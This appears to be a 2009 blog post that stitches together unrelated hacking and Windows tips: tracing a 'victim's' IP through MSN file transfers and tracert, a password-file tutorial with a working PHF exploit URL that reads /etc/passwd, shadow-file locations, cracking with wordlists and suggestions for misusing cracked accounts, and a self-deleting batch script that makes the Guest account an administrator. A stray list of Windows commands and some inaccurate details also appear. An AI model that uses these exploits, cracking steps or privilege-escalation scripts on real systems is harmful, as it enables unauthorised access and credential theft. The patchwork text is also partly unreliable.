Sunday, March 29, 2009

Info About Ip And Trace It

Getting the IP or Internet Protocol of a remote system is the most important and the first step of hacking into it. Probably it is the first thing a hacker do to get info for researching on a system. Well IP is a unique number assigned to each computer on a network. It is this unique address which represents the system on the network. Generally the IP of a particular system changes each time you log on to the network by dialing to your ISP and it is assigned to you by your ISP. IP of a system which is always on the network remains generally the same. Generally those kind of systems are most likely to suffer a hacking attack because of its stable IP. Using IP you can even execute system commands on the victim’s computer.

Lets take the example of the following IP address: 202.144.49.110 Now the first part, the numbers before the first decimal i.e. 209 is the Network number or the Network Prefix.. This means that it identifies the number of the network in which the host is. The second part i.e. 144 is the Host Number that is it identifies the number of the host within the Network. This means that in the same Network, the network number is same. In order to provide flexibility in the size of the Network, here are different classes of IP addresses:



Address Class Dotted Decimal Notation Ranges

Class A ( /8 Prefixes) 1.xxx.xxx.xxx through 126.xxx.xxx.xxx

Class B ( /16 Prefixes) 128.0.xxx.xxx through 191.255.xxx.xxx

Class C ( /24 Prefixes) 192.0.0.xxx through 223.255.255.xxx



The various classes will be clearer after reading the next few lines.



Each Class A Network Address contains a 8 bit Network Prefix followed by a 24-bit host number. They are considered to be primitive. They are referred to as "/8''s" or just "8's" as they have an 8-bit Network prefix.

In a Class B Network Address there is a 16 bit Network Prefix followed by a 16-bit Host number. It is referred to as "16's".



A class C Network address contains a 24-bit Network Prefix and a 8 bit Host number. It is referred to as

"24's" and is commonly used by most ISP's.



Due to the growing size of the Internet the Network Administrators faced many problems. The Internet routing tables were beginning to grow and now the administrators had to request another network number from the Internet before a new network could be installed at their site. This is where sub-netting came in.



Now if your ISP is a big one and if it provides you with dynamic IP addresses then you will most probably see that whenever you log on to the net, your IP address will have the same first 24 bits and only the last 8 bits will keep changing. This is due to the fact that when sub-netting comes in then the IP Addresses structure becomes:



xxx.xxx.zzz.yyy



where the first 2 parts are Network Prefix numbers and the zzz is the Subnet number and the yyy is the host number. So you are always connected to the same Subnet within the same Network. As a result the first 3 parts will remain the same and only the last part i.e. yyy is variable.

***********************



For Example, if say an ISP xyz is given the IP: 203.98.12.xx Network address then you can be awarded any IP, whose first three fields are 203.98.12. Get it?



So, basically this means that each ISP has a particular range in which to allocate all its subscribers. Or in other words, all subscribers or all people connected to the internet using the same ISP, will have to be in this range. This in effect would mean that all people using the same ISP are likely to have the same first three fields of their IP Addresses.



This means that if you have done a lot of (By this I really mean a lot) of research, then you could figure out which ISP a person is using by simply looking at his IP. The ISP name could then be used to figure out the city and the country of the person. Right? Let me take an example to stress as to how cumbersome but easy (once the research is done) the above method can be.



In my country, say there are three main ISP’s:



ISP Name Network Address Allotted



ISP I 203.94.47.xx

ISP II 202.92.12.xx

ISP III 203.91.35.xx



Now, if I get to know the IP of an e-pal of mine, and it reads: 203.91.35.12, then I can pretty easily figure out that he uses ISP III to connect to the internet. Right? You might say that any idiot would be able to do this. Well, yes and no. You see, the above method of finding out the ISP of a person was successful only because we already had the ISP and Network Address Allotted list with us. So, what my point is, that the above method can be successful only after a lot of research and experimentation. And, I do think such research can be helpful sometimes.



Also, this would not work, if you take it all on in larger scale. What if the IP that you have belongs to someone living in a remote igloo in the North Pole? You could not possibly get the Network Addresses of all the ISP’s in the world, could you? If yes please send it to me J.



Well now I guess you have pretty good knowledge about what an IP is and what you can do by knowing the IP of a remote system. Now lets come to the point of finding out the IP of remote system.

Well you can easily figure out the IP of a remote system using the netstat utility available in the microsoft’s version of DOS. The netstat command shows the connections in which your system is engaged to and the ports they are using. Suppose you are checking your mail in hotmail and you want to find out the IP of msn. All you need to do is to open a dos window (command.com) and type netstat. You will see all the open connections of your system. There you will see something :



Proto Local Address Foreign Address State

TCP abhisek:1031 64.4.xx.xx:80 ESTABLISHED



Now you got the IP address of hotmail ass 64.4.xx.xx .

Similarly you can figure out the IP address of most http or ftp connections.



To know your own IP type the following command in a dos windows

C:\netstat –n

[this commands converts the IP name into IP addresses]

this is what you will probably see on typing the above command :



Proto Local Address Foreign Address State

TCP 203.xx.251.161:1031 194.1.129.227:21 ESTABLISHED

TCP 203.xx.251.161:1043 207.138.41.181:80 FIN_WAIT_2

TCP 203.xx.251.161:1053 203.94.243.71:110 TIME_WAIT

TCP 203.xx.251.161:1058 194.1.129.227:20 TIME_WAIT

TCP 203.xx.251.161:1069 203.94.243.71:110 TIME_WAIT

TCP 203.xx.251.161:1071 194.98.93.244:80 ESTABLISHED

TCP 203.xx.251.161:1078 203.94.243.71:110 TIME_WAIT



Here 203.xx.251.161 is your IP address.



Now lets clarify the format used by netstat :



Proto : It shows the type of protocol the connection with the remote system is using.

Here TCP (transmission control protocol) is the protocol used by my system to connect to other systems.



Local Address : It shows the local address ie the local IP. When the netstat command is executed without –n switch then the name of the local system is displayed and when the netstat is executed with –n switch then the IP of the local system is displayed. Here you can also find out the port used by the connection.

xxx.yyy.zzz.aaa:1024

in this format you will see the local address. Here 1024 is the port to which the remote system is connected in your system



Foreign Address :: It shows the IP address of the remote system to which your system is connected. In this case also if the netstat command is excuted with –n switch then you directly get the IP of the victim but if the netstat is executed without –n switch then you will get the address of the remote system. Something like



C:\netstat

Proto Local Address Foreign Address State

TCP abhisek:1031 msgr.lw4.gs681.hotmail.com:80 ESTABLISHED



Here msgr.lw4.gs681.hotmail.com is the address of the foreign system . putting this address in any IP lookup program and doing a whois lookup will reveal the IP of the remote system.



Note: The port to which your system is connected can be found from this in the same way as I have shown in the case of local address. The difference is that, this is the port of the remote system to which your computer is connected to.

Below I have produced a list of ports and popular services generally found to be running.

21 :: FTP port

80 :: http port

23 :: Telnet port



Note: If your execute the netstat command and find ports like 12345,27374 are open and are in use then make it sure that your sweat heart computer is infected with her boyfriend.. J J J J I mean your computer is infected with some sort of Trojan.

Below I have produced a list of commonly known Trojans and the ports they use by default. So if you find these ports open then get a good virus buster and get these stupid servers of the Trojans kicked out. Well if you want to play with these Trojan by keeping them in your computer but not letting them ruin your system performance then just disble it from the system registry run and they wont be loaded to memory each time when windows starts up[This trick doesn’t work for all Trojans].



Netbus :: 12345(TCP)

Subseven :: 27374(TCP)

Girl Friend :: 21554(TCP)

Back Oriface :: 31337 (UDP)



Well guys and gals I hope you are now well familiar with the term IP and what is the utility of IP in cyber world and how to get the IP of a remote system to which you are connected. I hope you find my writings very easy to undertstand. I know I lack the capacity of explaining myself but I try my level best to make things very easy and clear for you’ll.




How to get the IP of a remote system while chatting through msn messenger ::




This is a tutorial on how to get IP address from MSN messenger. This is actually
a really easy thing to do. It is not like going through the hard time and reversing
MSN messenger like many people think.

The IP address is only given when you accept or are sending a file through MSN
messenger. When you send IM's, the message is sent through the server thus hiding
your victims IP and your. But when you send a file or recieve a file, it is direct
connection between the two computers.

To obtain the IP accept a file transfer or send a file to the victim, when the file
sending is under way from the dos prompt type "netstat" without the quotation marks.
You should get a table like this:

Proto Local Address Foreign Address State
TCP kick:1033 msgr-ns29.msgr.hotmail.com:1863 ESTABLISHED
TCP kick:1040 msgr-sb36.msgr.hotmail.com:1863 ESTABLISHED
TCP kick: ESTABLISHED

The top name in the list is the server's address for IMing. There could be many of
the second name in the list, as a new connection is made to the server for every
room you are IMing to. You are looking for the address of the remote host in
this table it may be something similar to "host63-7-102-226.ppp.cal.vsnl.com" or “203..64.90.6”.
without the quotation marks.
All you need to do now is to put this address in you IP lookup programe and get the IP of the remote system.


Well 50%of the work is done now. Now you know how to get the IP of a remote system, so its time to trace it down and find some details about the IP.



Tracing an IP is quite simple. You can do it the easy way by using some sweet softwares like Visual Trace 6.0b

[ftp://ftp.visualware.com/pub/vr/vr.exe]

Neotrace

[http://www.neoworx.com/download/NTX325.exe]

or by our way ie. Using MS DOS or any other version of DOS.

Well I suggest you to use DOS and its tracert tool for tracing the IP cause using it will give you a clear conception about the art of tracing an IP and I guarantee that you will feel much satisfied on success than using a silly software. Furthur you will know how things work and how the IP is traced down and the different networks associated in this tracing process.



Let us take a look at tracert tool provided for DOS by Microsoft.

It is a very handy tool for peoples need to trace down an IP.

Just open any DOS windows and type tracert.



C:\windows>tracert



Usage: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name


Options:

-d Do not resolve addresses to hostnames.

-h maximum_hops Maximum number of hops to search for target.

-j host-list Loose source route along host-list.

-w timeout Wait timeout milliseconds for each reply.


You will now see a description of the tracert command and the switches associated with it.

Well these switches doesn’t makes much difference. All you can do is to increase the timeout in milliseconds by using –w switch if you are using a slow connection and the –d switch if you wish not resolve address to hostnames by default.

By default tracert performs a maximum of 30 hops trace. Using the –h switch you can specify the number of hops to perform.

Now its time for execution.

Let us trace down the IP yahoo.com [216.115.108.243]



TIP: If you have done a long research (I mean a lot) then simply looking at the IP you can figure out some info from it. For example the IP 203.90.68.8 indicates that the system is in India. In India IPs generally begin with 203 and 202



C:\WINDOWS>tracert yahoo.com



Tracing route to yahoo.com [216.115.108.243] over a maximum of 30 hops:



1 308 ms 142 ms 127 ms 203.94.246.35

2 140 ms 135 ms * 203.94.246.1

3 213 ms 134 ms 132 ms 203.94.255.33

4 134 ms 130 ms 129 ms 203.200.64.29

5 122 ms 135 ms 131 ms 203.200.87.75

6 141 ms 137 ms 121 ms 203.200.87.15

7 143 ms 170 ms 154 ms vsb-delhi-stm1.Bbone.vsnl.net.in [202.54.2.241]

8 565 ms 589 ms 568 ms if-7-0.bb8.NewYork.Teleglobe.net [207.45.198.65]

9 596 ms 584 ms 600 ms if-3-0.core2.NewYork.teleglobe.net [207.45.221.66]

10 * * * Request timed out.

11 703 ms 701 ms 719 ms if-3-0.core2.PaloAlto.Teleglobe.net [64.86.83.205]

12 694 ms 683 ms 681 ms if-6-1.core1.PaloAlto.Teleglobe.net [207.45.202.33]

13 656 ms 677 ms 700 ms ix-5-0.core1.PaloAlto.Teleglobe.net [207.45.196.90]

14 667 ms 673 ms 673 ms ge-1-3-0.msr1.pao.yahoo.com [216.115.100.150]

15 653 ms 673 ms 673 ms vl20.bas1.snv.yahoo.com [216.115.100.225]

16 666 ms 676 ms 674 ms yahoo.com [216.115.108.243]

Trace complete.



Note: Here I have traced yahoo.com. In place of yahoo.com you can give the IP of yahoo or any other IP you want to trace, the result will be the same.



Now carefully looking at the results you can figure out many information about yahoo’s server [216.115.108.243]

First packets of data leave my ISP which is at 203.94.246.35 .Similarly you can find out the different routers through which the packets of data are send and received to and from the target system. Now take a look at the 13th line you’ll see that the router is in PaloAlto.Teleglobe.net from this you can easily figure out that the router is in Palo Alto. Now finally look at the target system ie. Yahoo’s server vl20.bas1.snv.yahoo.com . Now you got the address of yahoo’s server. Now put this address in any IP lookup programe and perform and reverse DNS lookup and you will get most of the info about this address,like the place where it is in.

Well another thing you can find out using the tracert tool is that the number of hops (routers) the target system is away from you. In case of tracerouting yahoo.com we find that the target system ie yahoo’s server is 16 hops away from my system. This indicates that there are 16 routers between my system and yahoo’s server.



Apart from tracing an IP you can find out many usefull details about the target system using the tracert tool.



Firewall Detection



While tracerouting a target system, if you get * as an output then it indicates timeout error. Now if you peform another tracerout to the same taeget system at some other time with a good connection and in this way few times more and if you always get * as the output then take it for sure that the target system is running a firewall which prevents sending of data packets from the target system.



Example



Some days ago I tried to tracert hotmail’s server in plain and simple way using tracert without any trick.This is what I found out :




c:\windows>tracert 64.4.53.7



Tracing route to lc2.law5.hotmail.com [64.4.53.7]


over a maximum of 30 hops:






1 * * * Request timed out.

2 161 ms 147 ms 85 ms 203.90.69.81

3 126 ms 261 ms 219 ms 203.90.66.9

4 121 ms 115 ms 228 ms delswp2.hclinfinet.com [203.90.66.133]

5 727 ms 725 ms 711 ms 203-195-147-250.now-india.net.in [203.195.147.250]

6 1006 ms 794 ms 952 ms core-fae-0-0.now-india.net.in [203.195.147.3]

7 826 ms 731 ms 819 ms 213.232.106.9

8 885 ms 744 ms 930 ms 213.166.3.209

9 851 ms 1020 ms 1080 ms 213.232.64.54

10 1448 ms 765 ms 1114 ms pos8-0.core2.London1.Level3.net [212.113.0.118]

11 748 ms 789 ms 750 ms ge-4-2-1.mp2.London1.Level3.net [212.187.131.146]

12 719 ms 733 ms 846 ms so-3-0-0.mp1.London2.Level3.net [212.187.128.46]

13 775 ms 890 ms 829 ms so-1-0-0.mp2.Weehawken1.Level3.net [212.187.128.138]

14 853 ms 852 ms 823 ms so-3-0-0.mp1.SanJose1.Level3.net [64.159.1.129]

15 889 ms 816 ms 803 ms so-7-0-0.gar1.SanJose1.Level3.net [64.159.1.74]

16 * * * Request timed out.

17 * * * Request timed out.

18 * * * Request timed out.

19 * * * Request timed out.

20 * * * Request timed out.

21 * * * Request timed out.

22 * * * Request timed out.

23 * * * Request timed out.

24 * * * Request timed out.

25 * * * Request timed out.

26 * * * Request timed out.

27 * * * Request timed out.

28 * * * Request timed out.

29 * * * Request timed out.

30 * * * Request timed out.

Trace complete.


I performed the same tracert many times a day but concluded with the same result. This indicates that the systems after the router SanJose1.Level3.net has firewalls installed which prevents the outgoing of data packets.



Detecting Traceroute Attempts on your System



You can detect that an attacker is performing a traceroute on your system, if you see the following symptoms:



1. If you observe port scans on very high UDP ports. This symptom means that the attacker has performed a traceroute on your system. However, it could also mean a simply port scan. Either way, it signifies the fact that your system is being scanned.



2. If the packet-monitoring tool installed in your network, picks up several outgoing TTL-exceeding messages, then it is yet another sign that someone is doing a traceroute on your system.



3. If in these log files, you also observer an outgoing ICMP port unreachable error message, then it means that since a traceroute was done on your system and as the target system i.e. your system, was reached, it responded with this error message.



You can also find our more information on the attacker (if he performs a traceroute on your system) by simply studying the sniffer log files. If you observer the TTL values, then we can easily figure out the following information on the attacker by making use of OS detection techniques discussed earlier in this white paper:

Enable Right Clicks on The Sites That Disable it

Lots of web sites have disabled the right click function of the mouse button... it's really, really annoying. This is done so that you don't steal (via right-click->save picture) their photos or images or any other goodies. Unfortunately, it disables ALL right-click functionality: copy, paste, open in new window.

It's easy to change, assuming your using IE 6:
Click "Tools"->"Internet Options"
Click the "Security" tab
Click "Custom Level"
Scroll down to the "Scripting" section
Set "Active Scripting" to "disable"
Click "Ok" a couple of times.

You'll probably want to turn this back to "enable" when your done... 'cause generally the javascript enhances a website.

Some Info About Windows File Systems

For most users running Windows XP, NTFS is the obvious choice. It's more powerful and offers security advantages not found in the other file systems. But let's go over the differences among the files systems so we're all clear about the choice. There are essentially three different file systems available in Windows XP: FAT16, short for File Allocation Table, FAT32, and NTFS, short for NT File System.

FAT16


The FAT16 file system was introduced way back with MS–DOS in 1981, and it's showing its age. It was designed originally to handle files on a floppy drive, and has had minor modifications over the years so it can handle hard disks, and even file names longer than the original limitation of 8.3 characters, but it's still the lowest common denominator. The biggest advantage of FAT16 is that it is compatible across a wide variety of operating systems, including Windows 95/98/Me, OS/2, Linux, and some versions of UNIX. The biggest problem of FAT16 is that it has a fixed maximum number of clusters per partition, so as hard disks get bigger and bigger, the size of each cluster has to get larger. In a 2–GB partition, each cluster is 32 kilobytes, meaning that even the smallest file on the partition will take up 32 KB of space. FAT16 also doesn't support compression, encryption, or advanced security using access control lists.


FAT32

The FAT32 file system, originally introduced in Windows 95 Service Pack 2, is really just an extension of the original FAT16 file system that provides for a much larger number of clusters per partition. As such, it greatly improves the overall disk utilization when compared to a FAT16 file system. However, FAT32 shares all of the other limitations of FAT16, and adds an important additional limitation—many operating systems that can recognize FAT16 will not work with FAT32—most notably Windows NT, but also Linux and UNIX as well. Now this isn't a problem if you're running FAT32 on a Windows XP computer and sharing your drive out to other computers on your network—they don't need to know (and generally don't really care) what your underlying file system is.


The Advantages of NTFS


The NTFS file system, introduced with first version of Windows NT, is a completely different file system from FAT. It provides for greatly increased security, file–by–file compression, quotas, and even encryption. It is the default file system for new installations of Windows XP, and if you're doing an upgrade from a previous version of Windows, you'll be asked if you want to convert your existing file systems to NTFS. Don't worry. If you've already upgraded to Windows XP and didn't do the conversion then, it's not a problem. You can convert FAT16 or FAT32 volumes to NTFS at any point. Just remember that you can't easily go back to FAT or FAT32 (without reformatting the drive or partition), not that I think you'll want to.
The NTFS file system is generally not compatible with other operating systems installed on the same computer, nor is it available when you've booted a computer from a floppy disk. For this reason, many system administrators, myself included, used to recommend that users format at least a small partition at the beginning of their main hard disk as FAT. This partition provided a place to store emergency recovery tools or special drivers needed for reinstallation, and was a mechanism for digging yourself out of the hole you'd just dug into. But with the enhanced recovery abilities built into Windows XP (more on that in a future column), I don't think it's necessary or desirable to create that initial FAT partition.

When to Use FAT or FAT32

If you're running more than one operating system on a single computer, you will definitely need to format some of your volumes as FAT. Any programs or data that need to be accessed by more than one operating system on that computer should be stored on a FAT16 or possibly FAT32 volume. But keep in mind that you have no security for data on a FAT16 or FAT32 volume—any one with access to the computer can read, change, or even delete any file that is stored on a FAT16 or FAT32 partition. In many cases, this is even possible over a network. So do not store sensitive files on drives or partitions formatted with FAT file systems.

Password File And Encrypt Software

Introduction

Passwd files are the easist and simplist ways to hack. This text will explain what they are, how to get them, how to crack them, what tools you will need, and what you can do with them. Of course the minute you sign on the account you just happened to crack because of this file, you are breaking the law. This text is for information, not illegal activites. If you choose to do illegal activies with the information from this it is no one's fault but your own.


What is a Passwd File

A passwd file is an encrypted file that contains the users on a servers passwords. The key word here is encrypted, passwd file should look something like this

root:x:0:1:0000-Admin(0000):/:/bin/ksh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
listen:x:37:4:Network Admin:/usr/net/nls:nobody:x:60001:60001:uid
nobody:/:noaccess:x:60002:60002:uid noaccess:/:
ftp:x:101:4:
FTPUser:/export/home/ftp:
rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rrc



Out of that entire section the only name you could use would be rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rcc Heres how you read the File

rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rcc
Username: rcc
Encrypted Password: uXDg04UkZgWOQ
User number: 201
Group Number: 4
Real Name (usually): Richard Clark
Home Directory: /export/home/rrc
Type of Shell: /bin/ksh

Because it is the only name with an encrypted password.
You will never find a passwd file that has a passwd for
anything like ftp, listen, bin, etc., etc. Occasionally
using the PHF exploit or unshadowing a passwd file you can get an encrypted password for root.



PHF Exploit

First let me explain what an exploit is. An Exploit is a hole in software that allows someone to get something out of it that... Well you aren't supposed to.
The PHF exploit is a hole in CGI, that most servers have fixed now (if they have CGI). Lets just say a very popular IRC place has a problem with their CGI. Also on the subject of servers with the exploit open, many forien servers have this open. Unlike the FTP Passwd you don't even have to access their FTP or login. What you do is get a WWW browser and then in the plass for the WWW address type:
http://www.target.com/cgi-bin/phf?Qalias=j00%ffcat%20/etc/passwd
In www.target.com Place who's passwd you want to get. If you get a message like "The requested object does not exist on this server. The link you followed is either outdated, inaccurate,
or the server has been instructed not to let you have it." its not there. If you get "You have been caught on Candid Camera!" They caught you, but don't fear they rarly ever Report you. I have yet to find a server that does report. Of course if you get "root:JPfsdh1NAjIUw:0:0:Special admin sign in:/:/bin/csh
sysadm:ufcNtKNYj7m9I:0:0:
Regular Admin login:/admin:/sbin/sh
bin:*:2:2:Admin :/bin:
sys:*:3:3:Admin :/usr/src:
adm:*:4:4:Admin :/usr/adm:/sbin/sh
daemon:*:1:1: Daemon Login for daemons needing
nobody:*:65534:65534::/:
ftp:*:39:39:FTP guest login:/var/ftp:
dtodd:yYn1sav8tKzOI:101:100:John Todd:/home/dtodd:/sbin/sh
joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh"

Save the file as a text and keep it handy, because you will need it for later in the lesson.


FTP Passwd

The Passwd file on some systems is kept on FTP, which can pretty much be accessed by anyone, unless the FTP has a non-anonymous logins rule. If you are desprite to get a passwd file from a certain server (which may not even be open, so only do if you are desprite or you want to hack your own server) get an account that allows you access to their FTP. What you do is get an FTP client such as WS FTP or CuteFTP. Find the servers name and connect to it. You should get a list of Directories like "etc, hidden, incoming, pub" goto the one called etc. inside etc should be a few files like "group, passwd" if any chance you see one called shadow there is a 8/10 chance you are about to deal with a shadowed passwd. Well get the passwd file and maybe check out what else is on the server so it won't look so suspious. Anyway when you log out, run and check out your new passwd file. If you only see names like "root, daemon, FTP, nobody, ftplogin, bin" with * beside their names where the encrypted passwd should be, you got a passwd file that you cannot crack. But if it happens to have user names (like rcc:*: or ggills:*:" with a * (or another symbol) you have a shadowed passwd. Of course if you have been reading and paying attention if you have something that has a few things that look like:
"joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh"
You have gotten one you can crack .

Shadowed Passwd's


Now if you happen to find a passwd fiel that looks something like this: "joetest:*:102:100::/home/joetest:/usr/bin/restsh"
which has a user name, not a programs, you have a shadowed passwd. The shadow file has the encrypted passwords on it. Depending on the Operating System, the passwd file may be in different places. To find out what Operating system your target is running from telnet (connected to that server of course) type uname -a and it should say, if you cannot get to telnet there is other methods of finding out. Here is a guide to systems passwd file locations (taken from a text on passwd files by Kryto.) A token is the * (or other symbol) beside a shadowed passwds user name


UNIX Path Token
----------------------------------------------------------------
AIX 3 /etc/security/passwd !
or /tcb/auth/files/
A/UX 3.0s /tcb/files/auth/?/ *
BSD4.3-Reno /etc/master.passwd *
ConvexOS 10 /etc/shadpw *
ConvexOS 11 /etc/shadow *
DG/UX /etc/tcb/aa/user/ *
EP/IX /etc/shadow
HP-UX /.secure/etc/passwd *
IRIX 5 /etc/shadow
Linux 1.1 /etc/shadow *
OSF/1 /etc/passwd[.dir|.pag] *
SCO Unix #.2.x /tcb/auth/files/ / *
SunOS4.1+c2 /etc/security/passwd.adjunct ##username
SunOS 5.0 /etc/shadow
System V Release 4.0 /etc/shadow
System V Release 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS /etc/udb *
Anyway once you have the passwd file (with user names) and shadow file you can find a unshadowing program which combines the passwd file and the shadow passwd and combines them into what a regualr passwd file would be.
A unshadowing program Download Now some servers have the shadow file on retrictions so no one without a special account on the server can get to it.


Crackers

A cracker takes the passwd file and a wordlist and compares the wordlist to the passwd files encrypted passwd. Download PaceCrack95

Download PaceCrack95

John the Ripper is the greatest, but it can be gotten off any decent hacking page. Same for Cracker Jack. A Cracker will load a wordlist and a passwd file and compare the two. When it cracks a password it will tell you the user name and the unencrypted password. You don't need to write it down because the program auto saves it. Cracker Jack saves the file as jack.pot and i think John the Ripper does too. PaceCrack95 Ver. 1.1 saves it to the files name (ex., passwd.txt.db) with the exact name and makes it a .DB file. I like to keep a passwd file once i have cracked it and later try out a new passwd cracker on it with the same wordlist and see if it works...

Wordlists

Wordlists are a nessicity to cracking passwd files. They are just huge lists of words. The biggest wordlist is avaliable from here:
ftp://ftp.ox.ac.uk/pub/wordlists/
If you get a passwd file from another contry get a wordlist with the same launguage as the worlist came from, as the users would probably use words they are familier with . There are some programs which can make random numbers to what you specify but that might not be really great, since there is such a huge amount of number combinations they could use. I am not completly saying they are useless since i have cracked a password with one before, I had fashoned my own list of 4 digit numbers since people might use their phone number and well it worked .

What to do with a Cracked Passwd file

What you can do with a passwd is up to you. The nice thing to do is inform the administator of the server that, accounts on his (or her) server are insucure and possibly open to anyone hacking an account and bringing havok upon their server. Some other things you can do is fire up good ole telnet and connect to one of their ports and see what you could do with that account. The possiblities are endless. You could hack a webpage (i wouldn't do that on account of how lame it is to destruct someones piece of work.)
You could use an exploit in sendmail and get root or install a sniffer on the system and get all the passwords you could ever want from it. You could use the account to do work on OTHER servers that you sure as hell wouldn't want to do from your own. If your account is canceled you can use a hacked accounts dial up till you purchase a new one. Like I said the list goes on and on. I am sure noone wants you doing anything destuctive (its lame anyhow.) And the best thing to do is report the problem to the system admin so, if he finds out he won't freak and call your admin and tell him you have been doing naughty things or even call the cops. I hope this text was informative enough to fufill your needs

ADMINISTRATOR IN WELCOME SCREEN

When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode.
First you must ensure that the Administrator Account is enabled:

1 open Control Panel
2 open Administrative Tools
3 open Local Security Policy
4 expand Local Policies
5 click on Security Options
6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the "Win2000 Logon Screen Tweak" ie.
1 open Control Panel
2 open User Accounts
3 click Change the way users log on or log off
4 untick Use the Welcome Screen
5 click Apply Options
You will now be able to log on to Windows XP as Administrator in Normal Mode.

EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!

Start the Registry Editor Go to:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \
Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.

HaCk "GUEST" with Admin privileges........

open a notepad and copy text below this....

@echo off
title Please wait...
cls

net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add

del %0




Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...

ADDUSERS Add or list users to/from a CSV file

ARP Address Resolution Protocol

ASSOC Change file extension associations

ASSOCIAT One step file association

AT Schedule a command to run at a later time

ATTRIB Change file attributes

BOOTCFG Edit Windows boot settings

BROWSTAT Get domain, browser and PDC info

CACLS Change file permissions

CALL Call one batch program from another


CD Change Directory - move to a specific Folder

CHANGE Change Terminal Server Session properties

CHKDSK Check Disk - check and repair disk problems

CHKNTFS Check the NTFS file system

CHOICE Accept keyboard input to a batch file

CIPHER Encrypt or Decrypt files/folders

CleanMgr Automated cleanup of Temp files, recycle bin

CLEARMEM Clear memory leaks

CLIP Copy STDIN to the Windows clipboard.

CLS Clear the screen

CLUSTER Windows Clustering

CMD Start a new CMD shell

COLOR Change colors of the CMD window

COMP Compare the contents of two files or sets of files

COMPACT Compress files or folders on an NTFS partition

COMPRESS Compress individual files on an NTFS partition

CON2PRT Connect or disconnect a Printer

CONVERT Convert a FAT drive to NTFS.

COPY Copy one or more files to another location

CSVDE Import or Export Active Directory data

DATE Display or set the date

Dcomcnfg DCOM Configuration Utility

DEFRAG Defragment hard drive

DEL Delete one or more files

DELPROF Delete NT user profiles

DELTREE Delete a folder and all subfolders

DevCon Device Manager Command Line Utility

DIR Display a list of files and folders

DIRUSE Display disk usage

DISKCOMP Compare the contents of two floppy disks

DISKCOPY Copy the contents of one floppy disk to another

DNSSTAT DNS Statistics

DOSKEY Edit command line, recall commands, and create macros

DSADD Add user (computer, group..) to active directory

DSQUERY List items in active directory

DSMOD Modify user (computer, group..) in active directory

ECHO Display message on screen

ENDLOCAL End localisation of environment changes in a batch file

ERASE Delete one or more files

EXIT Quit the CMD shell

EXPAND Uncompress files

EXTRACT Uncompress CAB files

FC Compare two files

FDISK Disk Format and partition

FIND Search for a text string in a file

FINDSTR Search for strings in files

FOR Conditionally perform a command several times

FORFILES Batch process multiple files

FORMAT Format a disk

FREEDISK Check free disk space (in bytes)

FSUTIL File and Volume utilities

FTP File Transfer Protocol

FTYPE Display or modify file types used in file extension associations

GLOBAL Display membership of global groups

GOTO Direct a batch program to jump to a labelled line

HELP List of Help Commands

HFNETCHK Network Security Hotfix Checker

IF Conditionally perform a command

IFMEMBER Is the current user in an NT Workgroup

IPCONFIG Configure IP

KILL Remove a program from memory

LABEL Edit a disk label

LOCAL Display membership of local groups

LOGEVENT Write text to the NT event viewer.

LOGOFF Log a user off

LOGTIME Log the date and time in a file

MAPISEND Send email from the command line

MEM Display memory usage

MD Create new folders

MODE Configure a system device

MORE Display output, one screen at a time

MOUNTVOL Manage a volume mount point

MOVE Move files from one folder to another

MOVEUSER Move a user from one domain to another

MSG Send a message

MSIEXEC Microsoft Windows Installer

MSINFO Windows NT diagnostics

MSTSC Terminal Server Connection (Remote Desktop Protocol)

MUNGE Find and Replace text within file(s)

MV Copy in-use files

NET Manage network resources

NETDOM Domain Manager

NETSH Configure network protocols

NETSVC Command-line Service Controller

NBTSTAT Display networking statistics (NetBIOS over TCP/IP)

NETSTAT Display networking statistics (TCP/IP)

NOW Display the current Date and Time

NSLOOKUP Name server lookup

NTBACKUP Backup folders to tape

NTRIGHTS Edit user account rights

PATH Display or set a search path for executable files

PATHPING Trace route plus network latency and packet loss

PAUSE Suspend processing of a batch file and display a message

PERMS Show permissions for a user

PERFMON Performance Monitor

PING Test a network connection

POPD Restore the previous value of the current directory saved by PUSHD

PORTQRY Display the status of ports and services

PRINT Print a text file

PRNCNFG Display, configure or rename a printer

PRNMNGR Add, delete, list printers set the default printer

PROMPT Change the command prompt

PsExec Execute process remotely

PsFile Show files opened remotely

PsGetSid Display the SID of a computer or a user

PsInfo List information about a system

PsKill Kill processes by name or process ID

PsList List detailed information about processes

PsLoggedOn Who's logged on (locally or via resource sharing)

PsLogList Event log records

PsPasswd Change account password

PsService View and control services

PsShutdown Shutdown or reboot a computer

PsSuspend Suspend processes

PUSHD Save and then change the current directory

QGREP Search file(s) for lines that match a given pattern.

RASDIAL Manage RAS connections

RASPHONE Manage RAS connections

RECOVER Recover a damaged file from a defective disk.

REG Read, Set or Delete registry keys and values

REGEDIT Import or export registry settings

REGSVR32 Register or unregister a DLL

REGINI Change Registry Permissions

REM Record comments (remarks) in a batch file

REN Rename a file or files.

REPLACE Replace or update one file with another

RD Delete folder(s)

RDISK Create a Recovery Disk

RMTSHARE Share a folder or a printer

ROBOCOPY Robust File and Folder Copy

ROUTE Manipulate network routing tables

RUNAS Execute a program under a different user account

RUNDLL32 Run a DLL command (add/remove print connections)

SC Service Control

SCHTASKS Create or Edit Scheduled Tasks

SCLIST Display NT Services

ScriptIt Control GUI applications

SET Display, set, or remove environment variables

SETLOCAL Begin localisation of environment changes in a batch file

SETX Set environment variables permanently

SHARE List or edit a file share or print share

